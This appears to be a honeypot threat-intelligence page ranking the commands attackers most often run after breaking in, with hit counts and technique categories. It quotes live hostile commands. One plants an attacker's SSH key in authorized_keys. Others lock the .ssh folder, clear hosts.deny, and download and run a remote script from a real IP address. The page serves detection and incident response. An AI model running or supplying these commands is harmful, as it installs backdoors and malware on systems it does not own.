Executed Commands

Real-time analysis of the commands attackers execute most often after gaining system access. Data collected from our global honeypot network over the last 24 hours.

9789 commands in 24h

Top Executed Commands

1.
$Enter new UNIX password:
277 IPs, 687x
2.
$uname -s -v -n -m 2 > /dev/null
151 IPs, 516x
3.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
144 IPs, 469x
4.
$lockr -ia .ssh
337 IPs, 468x
5.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
296 IPs, 391x
6.
$uname -a
284 IPs, 379x
7.
$uname
286 IPs, 376x
8.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
292 IPs, 375x
9.
$cat /proc/cpuinfo | grep name | wc -l
288 IPs, 373x
10.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
289 IPs, 371x
11.
$uname -m
276 IPs, 366x
12.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
279 IPs, 363x
13.
$crontab -l
275 IPs, 361x
14.
$whoami
276 IPs, 361x
15.
$w
276 IPs, 359x
16.
$lscpu | grep Model
273 IPs, 357x
17.
$cat /proc/cpuinfo | grep model | grep name | wc -l
273 IPs, 356x
18.
$top
270 IPs, 355x
19.
$which ls
267 IPs, 344x
20.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
266 IPs, 340x
21.
$ls -lh $(which ls)
258 IPs, 317x
22.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
57 IPs, 301x
23.
$uname -m 2 > /dev/null
57 IPs, 159x
24.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
73 IPs, 75x
25.
$/bin/./uname -s -v -n -r -m
15 IPs, 37x
26.
$uname -s -v -n -r -m
13 IPs, 28x
27.
$if [ [ ! -d ${HOME}/.ssh ] ]
6 IPs, 15x
28.
$then
6 IPs, 15x
29.
$nproc
6 IPs, 14x
30.
$cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android
4 IPs, 13x

Reconnaissance

Commands to gather system information (uname, whoami, cat /etc/passwd)

Download

Commands to download malware (wget, curl, tftp)

Persistence

Commands to maintain access (crontab, chmod, chattr)

Lateral Movement

Commands to spread across the network (ssh, scp, ping)

About this data

These commands are captured in real time when attackers gain access to our honeypots. They represent actual techniques used in automated and manual attacks. Use this information to improve your threat detection and incident response.